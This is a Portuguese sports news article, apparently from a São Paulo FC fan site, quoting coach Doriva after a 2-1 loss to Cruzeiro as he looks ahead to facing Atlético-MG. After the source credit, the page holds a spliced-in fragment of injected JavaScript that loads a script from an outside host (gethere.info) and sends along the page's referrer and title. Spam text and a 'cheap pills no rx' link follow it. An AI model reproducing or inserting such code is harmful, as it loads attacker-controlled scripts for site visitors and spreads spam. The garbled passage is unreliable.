Destaque Noticia

Doriva ignora título do Corinthians e já projeta vitória sobre o Atlético-MG

Doriva não parece preocupado em evitar o título de campeão brasileiro do Corinthians. O técnico do São Paulo declarou após a derrota por 2 a 1 para o Cruzeiro, nesse domingo, no Mineirão, que a equipe dará o máximo dentro de campo para se manter na briga pelo G4 com uma vitória sobre o vice-líder Atlético-MG na próxima rodada. “Temos que fazer uma grande partida para derrotar o Atlético-MG no próximo jogo e continuar a busca pelo nosso propósito”, disse o comandante.

O treinador já havia dito durante a última semana que gostaria de enfrentar o Timão, no dia 22, com o título confirmado para o rival. Caso conquiste os três pontos contra o Galo, no próximo dia 19, o Tricolor eliminará qualquer chance matemática que o Corinthians tem de perder o troféu do Nacional.

Segundo Doriva, o momento decisivo do Brasileirão impede o São Paulo de desperdiçar mais pontos. “Estamos conversando e orientando. Sabemos que estamos bem vivos na competição. O fato de termos chances de conquistar o nosso objetivo já motiva os atletas. Temos um compromisso muito grande, mas hoje perdemos o jogo. A reação será imediata”, declarou.

A reapresentação do São Paulo está marcada para a quarta-feira. Ao que tudo indica, Doriva deverá comandar atividades táticas que priorizem a criação de jogadas ofensivas. O treinador não aprovou a disposição do time no primeiro tempo e deseja corrigir as falhas já na partida contra o Atlético-MG.

“Hoje fizemos um gol com o Luis Fabiano, mas criamos pouco. O Cruzeiro conseguiu impor um ritmo muito forte e eu fui obrigado a fazer um ajuste para conseguir encaixar a marcação. Nós equilibramos o jogo e até criamos algumas chances que poderiam ter sido convertidas em gol”, afirmou. “Não era o resultado que queríamos. Temos uma sequência difícil, mas estamos dentro e precisamos vencer para voltar a figurar no G4”, concluiu.

Gazeta Esportiva.nets.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; cheap pills purchase a cheap pills no rx – http://crna.radiostudent.si/?p=2967

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque Noticia

Mais em Destaque Noticia

Negociações suspeitas em cifras milionárias marcam diretoria do São Paulo

saopauloadmin19 de março de 2019

Segundo jornalista, Pato teria aceitado teto salarial do Tricolor

saopauloadmin18 de março de 2019

São Paulo só depende de si para avançar e pegar o Ituano nas quartas

saopauloadmin17 de março de 2019

Mancini pede reforços e diz que cobrança interna é forte no São Paulo

saopauloadmin17 de março de 2019

Negociação total de Militão renderá milhões ao Tricolor

saopauloadmin14 de março de 2019

Cuca vai ao CT do São Paulo e conversa com diretoria e Mancini

saopauloadmin13 de março de 2019

Profeta mira melhora do time para rodadas decisivas

saopauloadmin11 de março de 2019

Pablo:” A equipe está recolhendo os cacos que foram quebrados”

saopauloadmin9 de março de 2019

Quem é Luiz Fernando, prioridade na negociação do SPFC com o Botafogo?

saopauloadmin7 de março de 2019